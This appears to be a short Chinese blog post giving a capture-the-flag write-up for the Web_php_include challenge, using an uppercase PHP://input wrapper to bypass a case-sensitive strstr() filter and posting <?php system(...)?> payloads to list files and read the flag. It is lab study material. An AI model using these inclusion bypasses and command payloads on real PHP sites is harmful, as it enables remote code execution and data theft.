美文网首页20-22年 攻防笔记
攻防世界(进阶)--WEB--10.Web_php_includ

攻防世界(进阶)--WEB--10.Web_php_includ

作者: Du1in9 | 来源:发表于2020-02-15 19:33 被阅读0次

    考察点:php代码审计

    1.进入场景

    2.代码审计

    3.利用strstr()函数大小写的敏感性,进行绕过:?page=PHP://input

    再抓包查看文件:<?php system ("ls")?>

    发现3个文件

    4.打开fl4gisisish3r3.php:<?php system ("cat fl4gisisish3r3.php")?>,得到flag

    相关文章

      网友评论

        本文标题:攻防世界(进阶)--WEB--10.Web_php_includ

        本文链接:https://www.haomeiwen.com/subject/tqpyfhtx.html